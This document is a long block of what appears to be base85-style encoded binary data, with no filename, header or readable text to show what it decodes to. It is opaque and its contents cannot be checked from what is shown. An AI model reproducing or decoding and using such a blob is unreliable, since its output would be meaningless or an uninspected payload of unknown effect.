znuD#Y7u?nr4YPG!*X5mI@wL41v<%IUSG)V^&<~39{jYh!4{@9H5BWZpQqGyGy3QdaXev^|pZ!VplBZ=&5ZF)w7Yc`MC6p^! z0!u}ny^LV5VDs{@Gk}(YD z2N>&pFU{xIvq2x#X_KGm==4%&e-aN$D(>ekEo_C{7bX9x`@rIHAwmD7Pn}!i)~zhKbrD6Vs^i6Rz<`08Tk}J z`4dv$Nf$QnNdr4=h^jv+dy1W`aeK@vDwIECBl@?|yX~|J1&{qcxL3`qc9{$<>w!G7 zA_&F>-N=d?8qvW(H}oqfWxmnvy%9riZDY8zwKEmd z$93~5x}_-8r8u~h^T?rN1Yj~HrNO~P!&TMFmi-cSSE#m@p9BZXnXz1Rss&D~*?~Na zn=vj8Tf)Pv*a7jL@|Hl!LB~+%I4jQc)$&jS-Mm3lHN>C}kBLdCcuI*T2b%hz z`1h$C+%#B$$)wn7sXBydCT=2WRPA6}R|;WIp@COuswlxY-n}wi_azH3`xxUXt)Hf# zBQFo>Ijqu=yD8V->5i`$A()kWyRA!{8BVW<20H_{;r!1NK1$LujA9T-x3MGZ81ISG+qsL^_gXLZBT1Rb2FIAt6Oba|wRC zpj6kBvp$dCzQVI7{ zifvuv{l_7-wRh*my3C^gxUNq%{xV&nDx>QuOJ=8_ODn;DDU0)DnFNFFH_6L|=L=?} zI3LB|`WUrd8P0f(z{}j2)v$qFZ3f0P`~~o02+}ENbY!0UcbY@v3}EF3oh+K;`nmBo z#fqQqmx>G5kn%HI4Tk6bO7aU&#iJ?>Nc^pJX=&x=^3SmKYYsbeZczPS_5XcIuS@85 zb9C}x>`O&*hJI*jRJy4hyL3rC<;x)gTk`R_`l8lEv!I>wr*-pz?s|-)PhC81qH?xk z_nKyagoCH`)XenBkJ{vn6?Q<)CnCSwf%f8N*#^ zLoD0MfOSJN#0-+QUkyn;!5?9lA7&`Ti+SOyjcX3N9u?seVqNsMNZCEBad=3Mvn2}~ zd}C_f%lVr5UI8U|T>Iy_y-}ty-#)4N#)oK-R6*Cd>$Cj2VQFGjwR337$UI#!QkOQAWWQv|28UJ#-mY<=OBOeTQ-Iy&SVDRJo*@Ixb z@+Xxy4BP_v5ej=Y;=3G`A3dOZnoAl3{tr*Tf2jL8dO<9;n1G1`~zo7G)AFz{f+O!hcdKX0vC@l(9S=gL)R!5_bH7v!*l( zhStz^yuHDfI?_+w0st3FEep&D4f{ySvq=ync@d4h>fx9W;rWSM1g3Ik>x+@ul@c|? zL*Y&4uTpgH-W<5k7^9KEN)vF7#y@=6ohL`fIU0oZynLXf{qSyI()T|-|M|%e8TpB~ zf4ltKncq^KkX?EQpB$8RtjE4Q_~Z%b@((rd41e9fW%J8FKKy>Fdhz$8U(aajKJ)QG zbmyx`#eXzhWhmb>0pB8-g%hZ2E0G=rwQ7ZX7PE~6(7NQ5BV~{3Mo{wdY!o!UzZ;DU zZHb8onTel>6ebCjtz`96Fq@)WLVoY1@5^uWo#GVXt%|T(3LuM`wNRSjhCr9%0g#>k z4>vw04|#dWVq2ehsWoveikI%ayUb#}-+EX_rOJ3T(sipqPiVHY$-2ZvX|c#Lb#>-` z%UkHqzb&o#$BWgyC0|%G>wWmkVuR8mAP<;0UF3JTkl6u4shOwoM0md4+`oyG@Y5H- z9wq$l7i6fE9g+IZrY0tt{f3nV?0&I7+lR0ia}723DSi7({6vQlCYKj8^f}5QVJ!uC z)Wdm{ELA?1Fxyg&_#AN6X6s~XraS4JBu~)H9M2mzAa9^qO>TlAR6@HW13K_Wug<=L z{RgFb46$h9yl;IVUDE5p%F}>Sqap9ZxGnKW&`ECGsRuscqTDhoERxY4W$F@6m!dl z0OT84x1B6O&D)Cq_+_s3t2=Z!e6Dp!kFQ$BrhEh~48g)dd_%MUzI@j8^ywzwJma`F z(7!yrPbaP0p8t8R&tj#=5PTlPk7smYzQ+)6w3hOT%XEM~!UVWSlB-#-Fgj>xwqcS< z-AtEX=WliL^R2M6ZVAl%vG;pcA2+BtQZtk{af6?0tTQ2W9JBtF6nslGpAz&*iCykA z=Z9R&f2BVac6wJLjNQ}yET(UbX6Dhg&m&cJ#bKV<8UE^$L!F)V;a=53;6eIj!VgEm zXikqRaazyn-4O2L69!zI%=tP28Xx8Aa?NVXlSYrXN z(2r3^7;obLk&j)DUxyu=SKvrC{fHe>d~pV z!r7vzV)pq_6RGo-OBrni3F1v^Jt9h5a*6UZ)K!zuL-xJpkdhLzDOI@H4Z+y3qtvHD zhO(w1SMV^4X(DV_%*KNmj6xyq^q_BDymQ2cN3pE>YuLN7z<^Ag5PwJ>(g*q+c9zM? zYn6IHp!hx*aS+pOHga6DsRda}l~{Z%44^gp@sUuHmH!+5sSk$?aK@bB8n7SgGTQ0u z*+bxg!;z_f4=h?Xr*HSWV0-V@$H0y?ZR7oaUWCL<70zJHSTHKs!v7t=W}{2iwt|R9*O~| z8@d%uI^YUnm$}VGdhorRBQpK&Z-jFKr=<(QS3dRR>}En8)gFH96MXAq&yQ68zVvm%{7yzNUgO{N&zbnTcWB7;G@vdy zW4aEx><03*VmF#YXWtjU?*2r%u3^s20w1D#$>*@@O#W}1;mGyO_`enxBMyDj-Cbv* zs6m9R3waN#{D;7AfbzNQhbxJ0->Em4F925tXdd1o&Q!QDkj002yb8haAg6e@sImAH!ajj_P}{{W22&E#FDEF zk4tcK;FxO<_AOF>U~-7RQ%)uYTZ&nblY6_fW*48xKyVkq_MPL7cL)B!%$+Jd3|oCE1!z9Q~xFL)>YCm{cs>m0PA@K1Sw= zKYh&91}A>d%6CXV1(M{_wr+N&JEx;8TssVe|I-Afo|OgD>J=n4+VO*J zE1K?M@iuwL1w%bzXvV67kYJn=n)HCHgJH}@oxxjUBIAVh)Ez345(Ejle!_b9==zBD z=^%)WwPJV!P(VFvXoegRo8B`qs~xT4W!&)FH^h3VM_ij576+a|;H(E^;mLS~D)vb~ zO9@s?YQj%vcT|JtMvA=jSjxvArOc;x`dZl*mhpRcmYwS>vS4Iaahh=9!~??9YZlQ2 zdhlH8Wz|N9^|OP-SLVc4Cr0=`h_L^1Q5VDDcw<8|+1GjM*ms2Dvr5a8^n^MZ3U;I_ zYTQ*SAJj0(pnrJQ!;@7^fiSW5yL8(7Eg#Zz9-x)Nu|m`Q!zPAiX{Fb0c}8ldcA2gI z=p;DS*YRzmE+m#Az_wF5&ISFfPQ5Jpp3gk=Gv86N4XLVoG#KonqGF4ws@v_ZrDZjRI6{Bfxa| zvqn*d?)X+yO!aE78X-d6yvnxvTEJHQ<&PczfF3UHG%}?~5ATgf@x5+Ou0x%m1JP}j zEy+D+8>r_QeL*3kFYuj4QJ5jH(D@`ucKUmkk^hC5j%&{70pmD-zYE1b?$mF-5r9x- z4`kON4?t%>eWI*)yx-aFZdj-u=M;Fqq+0(6SUT}w)XiiSf79F*Ium$h_+=Dr*47dD zg(Nx6`IaVWiQn!$05L97EI(|^E=w}@*}kVxXA^% z`L&Ki9`YZ-BGDbK*4kPSE|#h}NiZG2^DzlI5|sK+_ZE3-ABR2bk$m>>Kr24LETl0W zb}MSaOLLOZan4ptK7if=b;ikas%0NPKKsQuyHnWSdh&WjjKLd7YDZc0(oo*p<3NlD zE|dCFRj;)_+@%r-5d6L>m_I&>*>UgLp-iERx2=VA{1-l!_{U6vT<#JBTE9K~88PFv z$o#Q^;v)49EJ@xT2bIXzMow={hoF1PcrEfquta!Zz`+8TMH0Th^fDmmX*x*#{MU5p zmh7Vs824w$))5E#B8MAcf+w@AJO^gsmeO3F_0-M8BFZka1FlLoWf#0_c^+~1Vo>Uv zqyw&QZ1>gCT81h$LtxD9IOinTbN5!q;wKwx-7fvwkej|8<|rzuUhCd00W#gl-w7#S z3=7Rb;R_|q9}uez5qM8cU4ZiJ1{w=2y@La6BvZ2kJLoZs$8mDwd7Pu*F@DTkH__Q8 zsFCeFw*x71!K_wimPL3LT7@K#RvHetrkj}>n$dlu+RXK{l_gz^XJRjfb|soH;J$MYJFBKU|9rcSMX1_l zu?vDTMkD+989sxBfWait_F&MX?GlGxitf_n&@(?n8Bj;=54%#-TEQ? z()fQ%=06J01f#I;28_4-4=*P&s^h@1r}Y; zDAtMfEUL4sPh99=$2s}ETcS0xcmVN=(H(vL%f(b)zgO+OTYq}MxQqL%bOb0fHxia( zoBWH1L9G9A=xfP0&qzwgi`{d{x_<2G2WJn!?S?=7eTMGNiD1kdoqwcfH?A=x9 zE6Dks9(X1tu0T-z?0K$noD=Kf?D}gklM{RN_0T}a3(D=UPjsbWgX@kl{mz|?GyGwDJ@g%>6Pt|L27v{?f&d|KvC=pZY~ zN5<@cpuQN09g0M;;lw+Dr`ZLr*ny<}{dQ3q0Ow)uYpaFkg`RG11d(e7TTLk*|9aN9 ze1z#*E-eJq+vy|KaY~+l7B_VNe||at-Rxh#1iF357Cn9$J$b_V*8$)&vvlDXOZ^4+ zE_cocf24c?N^vu`>1vhxLjrzun(GYQvQxPp8JXwVpKuc`}?W8k+$736g6yQoX4 z0ga-@DA~0Z7Qx2afe&ao4qDXx=cyKOmK*lXao62O1=b49wnFo}sWe_02JewN_q`r@ zp$yfPjYwy}BXW%Cs`b@l)@|tkbtW`7n^AY%H3QuBwq>UQICjj<&Exfexg#|GI^vWA z8xVafYC$W~pBlgeowecT_*Y&`?Ki|4#kr@0+{f~aTPZS5@|?ovlKV5QC4}(B(R?~) zCO!~-=tkEWX#9bt9Vt;RcI2P7GUBzF(7gcpdXZap58?pS;lod)D8bh7LTvmkOs*_lnUdqK)fU%MyZ8H7qj^cT+2^0u2bzlRB)U<5R`4$86_>h828grSd>~=v zxm&NZbz7+=S+rO?-9`BgfHThM#()TS>~*{T!fv!7hy*?#l=>7eFVpN7c$d-zujljd zE&ur3ne34_o!eT}Dfk@wUVCjfcccFg(s??XMhLkiDi| zH+Ll@ZMN#<<{DdrQuUCmMZ-epbmHmH#6E?f@PKO@H+9I3G11(oJ7BkI$e09P!i^2u zlOK&0g1G!@C{Xa;@j5wISi3M5-w|Di8IOFQmy?qpjSnpqVU9vi!yXPg0M ze$ePBirq>Z4!L_x@$^7E~SPim@}o+kw< z({Hn}fgewnlfNwfX{D%45yz=JZ+=a&+u-*yvR!^FT9GKe95?lkd&Im#Fc-9J(!)6x zj=CdX7Va2NXB0K8mO?L>r)o}E_hM{&QV#T80#vh&TdO2j1+a`2WcnqvY!jZ|%s-M|aojZ?+sSsbYPjLF_^+O##Rlwqx7QL_7a0DwL-_6*Mhnp^F+2cV}}9*ApJrU(A`n~NhOA%LG0b8_-Hi@P!*wf@MoMoSXSI{kxO}P0UEz-F#|>Y52dCfl=a4#8s+G3$EoDu>|!9#@a6teI?^o;;nH^~ z9l9k8I_QYCdtI%R83I&~wQ={nozB?#r~Rv}zik+5j1H&CQX)~0lSqGprn3CicBJ0N zd!H3v1|t6qC#=q8gd<|Lb*nF#aofFO@mqg(5WLjPm7phNvO3wFn7*&c+y6ZLhr{dZ z7xSO^K0Dj|Uu6s=^^K$aAZfSbW@qH&KQZOhwYHxh@bHS!kA?U18cBggZ0Z^he9!># zENJ7$4IQK#%^%X^)fF$g8`iH{GL^!-rH?rJgd=m4R`*U(pt0UxvmdXCW08a+-ovb@K$RZOE4ybV32!9 z?An5MWT!q7DJ&S6evv@paeh#9D;WrdGy+ zBmW?EW&~n!8uJ-Hn7;?%wk2v7Y)-+uHH*#Fpum_IL6_ z9YsNsr~2(^Ipj*u%*U=irDbws-wJazII!Hq|1c)I$0a){ElcAf8Gzq^8ytJ*LmQV^ z0JMZ;rpvP{N26O$U70PfOZHbv>8qCyF!#!fBL{C^l5;g?O2wP2 zNY>>wA`<(ftWO4034TRze`q#|bjy8x*Ui_=93S2DI4LdFz`GLLW!{_MILPMbD;2A2 zm{fh$O|23mv)LN$%>6+*dT%LHIc~qkY+EwO|FUySvOR;WYCol}TWcF#=<7~bfE`uA z25UJj-DsIvHU3YYfqAngko0$BJ_I#DMkS#$Uh61Rh+aI0?#&^ z9eLDcCXM%9t#j|5U^kV*F+)q0UVFS~v`>&|9N_{11nK7LE(>JsY3_2FZyhj2`LbWz zj&@vCh|ZnXn>K^j%ZIVC${?PF2LsS3o_G0|a}@(^@wUr|*LxtLaabopxixZGph#!z z8%Y#6g&G|3t?(3>L)`GnwV%+%r1{Q`jH}bN>b4veC1tdENl;q%2%M#0`tkKovSr_P zqscPS_Ci{A&mO&Ki?VSX$)>P(o4M%t$qGlP9`5O-vBU(_W@mgv>t$|NP<-Z5+AS}l zW}L>!c95lYGbU;-^3r>}y}u0k95QB9`n`~gxJ*sV$r}D*_lky>^B@{a{CykaKxtl{ zO^5*i9!&4pP z+|1I&;hUdEf#i-uRww=pA9`;84gn^`%%JUMyCRY|rsD!kr!x+8L~-3`5_Po0IX3qW zJ^Ydb#-1|jBTx8W*qB^BQakwVmHdg=m2j;kt;4UrrZoXC6CZmDgDUw&$MpQGwRbMA zg}D7iY!j_~mJ{}2ed@hW%{U&j*DiDs-(r$Wt9Qd|og~RWf8+h)k8J*)Y&_=3hXlm! zW%rrLmgB54y4T{`XLVsP_34_Hhk-_INPb;AF_nF_uDQ}O)5^vP=9kWX{i5Oe`yq&1 z?7(9_UDLZ%h|(^mpIWh>%qjFbmtWP$E1c5o_sd=DYt0bfKN%GqWnBT9SEcz`MeBLX zxpon^F9?s7B~mQNA{hHdLV16Ud!`O?LFxGP8g%XE;w76gDxRMtK*@dW>Mt$XxkqEW z+@lzZ3?G$p>qU|>n55VJEX2CIY2am~a5QSqaEIg}0FEvkcLQ^~l+i1c(A>`;I;?(3 z+(n!YA-l8JR?RhCOa(TL5m2yI+-Fn2I36i#z`=b>QFP1YcZf94 z-ge4-&eK+S?3RR1#fvL1!mI~RnBDC{W@tbPBTe3R?#q0|RWe8}WumQ*<6`}Y$b715pC>;@Ifw zlb{Yu0%VSoi~;;o?az;;!x4&xDdSK9^*aiHP(0D404uxm$>m&@A~-h<)&he^MEq-h za+9uMvIQwD!)A8aU#g4o-8Y>!-Eaox`mNxbdpCFd^}B`LPpoEhF#>PeR4#oS82D}*nk!n(CL(qsah)1Cd{4{w*wp_lH-?!d?{?628ID*D5zqwMOK zXja|TFz*ZTxGOX}Sb@<*vr%6d=^*xQ#If)-^<5S>xmB7m-fVHCJhy3!^qycc7gQ@&K_>p31q$t535<|9vR%zvd~hu zy(x6OGmg)CS$hQy6yPT=cF;Y_6HMtk-5O?Usz}j-Fc}#kA=%a_(QD+PmD+$}W zKHB?wsp>eIBS5Xil0C0%lUAhpytixR)S8z3@y~4GL^0z-xP_$lR}9qV-AaR&6zAS(Je zgM13KLvL~G>;F9qpyN+3Lu}%I6RZcpS9lv#aF@L_T7RJdGQ-%HAz?2fIVl)f2=ORCdoya(8LWhdw^%xYLPbY)%Qfg?DtFe*3r!R8Oc*x!Unk^&{?4R6--K!rts~@pDIi`I#AqC%8|z-!lL+ zSXL+G=l<)T4h_drW^upcB9rk-R`~8*Cq3Wm{S$-orTkR=#TT6I+N>s%O?vLyZUiU-DfFgBNT^52^NnOxAjdQ2X+p?Gc2pKmUGeDsh- zH>$vI=ic!$Hd|Xx@C(0sDH|vWtDjLFjCpdbXO~YX*2c$hNwZdGl^4rjyZm;P@b%zi zPM9V=uon!@$!3sLFM5pZgKXA|skZEWtdNNfUs<{=mn+M^m%J&;^bs6b5^XCdBjBQR zTbo1t>+l7a8zXeq%I&p69vfcN*h=ok z?V?ZUYe5w%oDvJ5UC!g?)IXoIV;1dp^{+<2Qj1$Ij)Jmxbw&$MGw^vLq2^$sA=jhM z-Nw#x)II8gH@=&Y;Tu+Fvv#asN_o30$n@Hls$Z5bkH?1-BYMmGp4Pw3eG{X0a2yAP zDGt}4geuBUT!->QW-gc9n>?{6r7o`r2vd0>-}dB~HcwPefUss~{(^%o-|_g}HGY5g zahQfj?M>fE(>5A8mJ_NL$*~7f>hk^v##eHeP4h>6d*db{_?A)bF@v{x_VfMzL$m`@ z@yzsr@_R>+3nt#C@-O>mt_7^|OC25=H&4_&G!~nhkH6y{AHs>(&-~FrSZcqNlJx<# z{kgL6&sh)nvImU&18*aSrBbg=`xNc6X1}^KS{KCWojB`oMIsEO!P&J!^|j=GQD0^< z7=U^CSd$}a6?$)H60`FpoOs4RExhVfG``^PO->%A!1>DqQORegj+vx5r3!QoLCrt8 zr&B<-sO{3IQLw2wIlJr8f2|I+n7o+Vq4ZtC^UI#n1^mj@nbYrq3HNnZ=IyOnk0)xj zK?Wzdg^{zX;u8+LTx-ed#YKU)nxe|M?yij^>@%4l~+{!mzLXrJAEKCVuM+#}hL z$$c@g2U~I0OStr8lKVs#h*`bXS9EY4z&bDUUA6L_@jkS;vv+Q0C6_ExzseQbhTDa%pI zBF?&4WZ|4}RqK17Zd}o`5VfzXtt1knzMmNyUspBs%3(+S>}`XdH=b4Mu&ztlqMi zD>>>dt5>W_JUyufC*5=W(_mY(C)@|UQxsvN4r_1TfwwSj*@|)Ho*a=?k=hn7WY>Hlxsfp5n{RH*4!Vduvm+Gn;tKJt8{qsc?H$8r zW-%)N*mgwGT(oLay#<261-~(*)Qm^bqrA@THB-N|lQim3mtn`pSgN_9-Zm7w0&wkO zJMJH~Dws4dpVFC+X)Uc3?lkDF^?w%|+ni-p&}P0AGgF~xx~;t04`(nN5YId zyV`pA5l;h~I`ud$71aJFRSV(fMG@%vWCo4eas+bQWjkE5FRD$g-sSRskA1UdE|fOm zzH#kTCq3n_w9eZ_R7tUL^n%v%SW0%s-x?Np6?2y zldJjZ(k)Myuuhpqc#ZKB_$wpzEIR+wSi#@cL&C37SwS;(-@VahXP~%A_zkwv%8-ZB zk5$8krskiDJHOcejt?Iz>^)L+BX(v)6Ld>p(;*ML_Kqn_&JQYIh^Sk@Q@|<0+qV{LvJ{`An5#~@(3i7Ci-#)=Iwtgk*sh7j8irc(STxu_^Q>cBz zmn1@Zv~108CUWV^A?NzNwADb%XOS;GHZJ;#iUFF_5m?SIg7?*{xN{k&M|dyML7ljB ztT!{5OO(nl0ojDgD@E6~4^0dU?n1LkaZ0(sWW5&TfHK@@HVM<-0 z6c_bps0oUnejw^-TuRWrFmYSVwepB?_RNO?4|8d2YjHKFR2)MZt2?O>&Z#a+z6*Nz z!s>oUK;*(oFUI9uK4S^6T!xp6c1|?B^mg^>T6?Tds|y^x-pA~n3ok#HB$h5QM%Wx3 zn{3fcJig|j>q5io+QV?gLf*RVa6+Ox@WNe`_0XvVbi=H6s=p?p_ic4E1#SRUzc7c; zY3FoNijRLEa)DMJu4@t{!BRJVZBkglT!hQFt*jqq`31(y6dBihQf{E=&=1%iA1#ZV zWI3}O<5zkEAt+FUobWklT_wBuE=zrWns8;LTn;WzBSCr zS_^k_o!0#cNN_+ZaJhdW%wW(qEdC1JUa3%kjcZ$q_kywQURnf_<%b)OawCtO?@~S3)ud&%p@5mu0BUvu9*&o+*BDXPYDhgcglP|1lXJE9NEv7#AlMmpCzPD0V zrh(OPJa<(E`IUD!Qa&2z6}y|Mrz|SAalavSXJ1L z`?C#QKYC!T5;9XeVYMS0OW}D})2WGC0_h(zwHoKIda2X1Q@Qysu}ehPuqN&hh(+$2I06+~&%~yOIin%H3Xpfx;CmOG`#Bg`1@FwFy0|B{a=B!?b*Cw=L>389Z(3xdyLI- zd3dOExbTYda@qIRKRiW5ZhO4AXSE-~&V;sE&28#!1rN%n^;8do3Z0SYFI8$hA;}3HR@MR*EX|%{-Ymgo)n{rv|k0GM&87Rlr(G~het7Bpc7}2emHW$;P zm1sR>xuUG0NxMTYmj47D2;9(y_%DB;EY$$Sv>#_X#@*a@eq(NX>-@~yTnnwlgv0#( zpdmpia8h1^}H%F9DJ^q}&^`y1Tk#xu#MIGgyV{uBv8aZn!yaDLY;riz7A%V^eR zrqaMCT`|3r^^Z~IAy!WYYS|r~0g0YC@$pUZ(#j(g!up(ashuI#L7yx`2D;YSObrH8 zhE)}<;oZ&IAF?;??c-gsbMW)$D^H;aBKIHBYMVG&erhYc-k}VYBVImR5z54b+-Qr+dBdFB`B|*3v*?-OloeI-jO;a%-?m(6Jh|p z*&0o^+jQ}n}Jk*%KFeXO@)`y141BC5#sx`QxO2Tepc5?E|LEYLUB}yfOuM* z&+^vN8F--%fJkrDXLmp~&&?(7@RQ&rg}KEQE@4vZD$ z@%N6j(S`F_*s#HClb1bNh~F;V-V##L?`gHsdirX*q4%d(j(W*z#)*8^1FY~yF8>p3 zSJ3|H6rDqQC`Yzo10N)qfjA1xV|Hqa)Hq zkFVEB&%@RpG4>^_Fchz;Tt`9Gts%CSg0h) zIu)`UPmKmp0fDA1&C+=H&CX8D@bP0t?iiF~eR9)lE&r6BC>>CDL+6_OO|Yr@eA>!3 z<@gg)vIt~0eaB$zYI0_{kc&QjB3k_d-eQiLPwy&>L3F_-&L_pw219aYWQAC_*g;in zH~T_tptCmRWP6i>=!1oQC7*AlA@MU4sCjJ~!=|clBDQaR(bU8$Q0vam|34}x#14@w zRAYsA4r|Z*^eAgv80sV|Y=tM0b9Hch+kN&F$cViEuS^LhIrvtiyn;x@G1APi{}8IP z{|mHg(9q`$D#jwo;)(ZDyK51Pa8sRIX4@QZ^}3)lU~JwKh5lS z6ql9p6s3R$9zdkyva$U8X5gx!#vEgN0;OI|mmMY5XIZezi`9{{cJ(Gfx$F+q=k+7f zV_q43hmm&4k(>tTTnoUuOe5lJE@T7Z|JJBwh~O?6k!d0g?x&$n;}T~~y8#nrPqqwE zCSc~=s2U(mA=MAnSATK2dIoZ}UR#4I)LpEv4Nq|2KlvS?KL6qfF||GMixT?+0glyF}k!*D=WO3XNO%5jRUI`s%7 z+>0Qdp}8LmR`V^^s@IZ?EbG8?yhPpdh%MDS08Ql`T5eXg=^&Inx-=+)pwDaMwT#mA zo8jc^pNMWW;l;J6Ly*BSgBck!;+d*eqE&sRTaVX3?X{ina zLBonBqlGdECVO6D4i%e2>o0`*il-F)?L}u$+T+bTo?SmizA6O0Nm9;;L|!df&kU`& zymV!10mF^+jW`~B6XNn;ol*#82UycCHol9LQgBMw|LNCn8f|8rUsEy1N~#+r6CcuE zvv%twG<dwlF3D3!=kvm|AN(;;nM3ES5sWeBQGo3S@-0rXke{WAxv63 zD?pR+Pc3LRi0bJjBC~7x3-r*MXYPa1*MthhS1-r7>p3!^2NmM!Fh9MMxo>1FYWT7E z`q#&y&2rNkNyICutBdk9>@1DaIhXi<^JpReUp?9o!}!>@klhh~?&a@D?lE{_sW*a~ zzU2iiE_rj>@$5)s?}>@*qf;-G@7S*^4qeqIA9)23g{jrXT_pG77au%Ep2avg3gslvT)G8fw4fakv}Jz_y7~qC}aXT8c8+vH=7J+!PL z(CRZmE-A=VP8%3t_Uqf0u=tq276RjsLXl>xAUI|)pl!_zzw}z zk`2w7N&=krC7Z`yu*MGVgeY1mD7FUsYw9!6B=)wmGhrkS z#eTL7(jmZy7VoNf0EjP0Yl3n;krI!DqT43!zTy~`;txzna|86^E7+HQx#|UMw(Yih z42N)|Q15cMOkcuF*-tYv~GxT0*U)dB!mz+<`9(- zy(pxS{xS_1(?PwG5yaxUAQI;=1~p0X%k4xbC!&FiA82^}De>3uM`92Fua;41W)#Xv z03pn(h>Ge8eB+C@XNHkvibIJaOxN7+17M1K zO|!$`?{$yH+&+~83c~(fkFhQx2_vC{tvaUBGC%d0m`fvl1k8*_+0$dUA;9c+Jj?Mb z<7452-Bw7)$0o%xCta~)s@f+;uj9y~A2cm~`Ib1~Y1k!g}Pg*JzZYnb5Y*h1imZ z)QTq$(gbHkq8@Z?n1mXu&V75Q3CROCvOZumxn|Iu(wj4il^9dj|hnl7~ z8Rc|L>l%_@+d}Qp9)N>|R-_M;Jmx~;`htvr+@4L1ZHqD0jJew$8G1y_fu(+dlU`>Q z@KfJ0MqNHibD2v+BvK-4E5$Gy2UWKX5b%D-AX}g2r>th+`<^%9dU|;)`%(zzhR_S; zToM&rtEyz3$|1Ca-MqtjIsOUlDE!qgQ4;0f0NBzTxmh$C^w5Z>DT{K$ zokEo*CD8GmaI;wTw1ELsc6@x8;$TgZ8`#$=8g6fKMRsGNc^ixF01A4v)?qrIgOXH9 zl5smn&#rR9#jdrg(kA$%J9K*Hz@kh{V*vjzO2h?bbtoJF$v+B}DFSG*^ZW#ln!^r* zE)etlVn4TF+|_?l_jP^8ovZOya(_xRaV46zlLo_90fY_GOrLXrzO z6S}c#_}QR}^aSi5_K6Hc{@=dZM6~v<`&IS(p6tlnAwLjvb52EyUyKrO$yFlUpUJw| zK7k;5CKrnwXbAD``{W$%MS25n!A{tZCw*xNHh<6{?4aCHu2-x!kffl7|4g<*DK2;g z5ki!0o%qW+u3@uH=6R0@12p5e-eohOX^FuC&5!y5L`$F+YvV ziY8T0e}D^N719jszqEH7$svT?zr>UhhI&lyR8OMKsr^=sw3l+gKTIq>!8#w~AJ0dU<(_sP$>;JOKJyW@$DR&2#o2O3lZp zy|s;TM8)x*K!oBcv~H;II!Sq6cWKEUBnhohgX2MjJmx>JQtn}+LM~<0wsT2fJ-nJE4)}|T3O`V3Vwsy#uofQ5J^-+G$!FiQoNtmpFv|@ODp*YhT-=x z-N2V9$VH_xXK`^dFY?b|zcIdC^bB`eDu>qu8pmwQ;>L`N)qgX7ai|;&?_OLjb4acG zH+*p1^5ln6&F#>B%qHtNVG6F_D*-lXAWdAM-&i_Rc{!UMDcTJLj?YDpV8?EQKMfk4 z0CiHc;wVW;1>%HDcj2T!PIYPaM-!#n)N&dlh+AU~=0;Ssa2>g)*B;B+++`e&G;89n zSwwx-^j46A=yxXs&k%*?SP2lV#zV?Suzt!tsa)DJdaYFb+5=;S688|)V(w>4fg+7f zb2h!3j|!(#WOVy?&h*fT*;PfqgbCJzpQsF^DK`{Pt^_E?8@dEh$~YpD)qbS%k>4RZ z{z~k!7g!SWy#H%STH+orD|dDU#N--R1cRnWRok!9x3=ctFV1D=|` zPjAp8#$H4_d?3=6c6ll064?;@+u`#ko4YChf?Lm3Wybbs3lixi#z}VkzjT9?q_oO5 zW;15wr=#-%aBBJN&1n#v?HXGC@;wI1?*(va`V^KOl5>tAZtj>2qPcilAO_Mn+)hOU z%?#nNT#u9qxr(Evu@R!DFuLMXd|G7O2?(6knl<8hD@mbM2Hlv&b!A$IZ2@W+_pZdtpSdnj5KV^xq z{bVkf(nZc6$33?VU%woD3YjsaZ~NwSHR!GK_Q|MBaYAW zlYGxxG&H!^A1BP1cRTYQhbp#VSHflSKoStM*~nSjGY4_m?2MRh=+QN@Byn^{Gs#qd zJXo(!5rZ^Q>UvV1;Tu3q7Qu6+Ir^f~Zj` zj&0KfvKm)^Lz6{9ca*Bx0VH879ZG}pj2*KB??IIP{68qe(sfiBE)n;hgSSTVxcN&ja~xEkNseS!Ex; zV%`qgoRF9Mhre`vJUYJT|YC8JbZ` zpr4?M+YCx=w4TGF_ZVPgcV3Yvdq^DRYlV?h@r1GKZmbe@9#3;;a0TJ5wx%D(aU0zi zB-{F0;eo~sL(E5J7EmYZUP`wk$>Slu^Bd=sVI zt#y=P9Psb!%%6`X%9NLFOC5q5!KI#*pblb{f$dk!n9-_BpL#8EC)BsEmnPP2*7q{K zB;x$%V-_S~g@@rYio|?9Q5k(ecM8!-^CKyqUU&1I!Z{D=quDLk4juaLwiC#%XUz)X zdM_h#aTvZv?V@*fMif3+D97!j9VVsHq6}b?bPv_owAU`Fo<;p$LI6!e~#z=eTHp#a%^fptHepSS?c>D+*o~9A~Q~? z4ANGx=I(=2Q#v_$2O~f|mPYm>Hi;Zvb46T)PptB%U~4vb5b|up(oDcJYTNRF-{+Q& zpdW|$J5F+(+2PI@>(U_IQ0K1gxl`!W#(b`kPY9u5hmY9&zcIAg%oD&>)Dd#?>odbS zd&pB)`aPr}0U?CNrDz@%J~{jgC6W5>{ZQjE|K)B+Bds;-5rYS|YX(gVJ^IXxUa#QC4;vBb)uL{0D(57sJwW5_AXeg!YR~E-gj*LB z3HhVxqMs4~cX|o_6d+|T`|)BK{dkI4T2nh~a;M9-eFLfGA^3>%)`Jo%uK$Laz%XX~ z2!?)&HeBey4K3?GlwWjy+m0g^cQ=%OJBF5|OU#7Wx3%P4;|+iyazb!B!~}sTVXel{ z>5QO(FmWJ^uIi-HbAY4-fT*yu1znl072*b917x#H9se&6q`tXJbV1~ZsNtlah>K)N znvDETG#>CI2!ki|ab!7tmqRiyzaqqKgVFI8G zFt;JjpQ5?68#5eQK}6yDGmNk5xcZ)Waw#!C)fmuTMng~peTvyO!QRHFtb?vJ!?=+u3Nelf>iI+ zi*x6r5fP`DEbaRp4d&pvG^GQp+}%9LFdpB1?JCfEI4e zg7ZK{w3koVDN|7s+BZ0j^|@7-tV&&0BtxRr)8^wz;_ieDHfZu;Vq&$Tpg@^017rB( zOo%e(t0DUbZ*AY!1wZ9GGm;yqg*)-(SwKd9tJ5UzJG|e3anXg+#+R~caRPnYr@$(ohUwZb%h#wUUErNWV(o>m~Lpts*@Q!v{{9MvlaVs5$B^8o|A@)Z%j-@D=f!* zEBP~BCM#bQ|C$JOzuy)^K-}7PVd<_QTKuwEGX;ir@D$HM-bqzfF)!l8=DH81dY~p@ zW+%#CTS2C>PLM?bTq6*8tn-QHI7#=@D}w=xWH>j3|(6T z4gPhl4{@{YT?;SuQ2@+gn~qz{2E-wGhRqkT4lTLbhHg{K6{{zTCRZ`UfXiQY0WB2d zg8+fRNGv)YJ%R32{D9HE?0q-B(HwVv6uasy(F* z?&*F?E-&ta^ZOv*(>+OkQN^joqjMH|N@`b74B>Tp0>7QB2}CG+gOzQQ+Sv?1AXr65 zcby~JN$!1zA-Wu`*HgdmQ->_qGKLCaWd4C&Z(hX1FoEuRcd;g@>WPhjTGU+K!}~=W 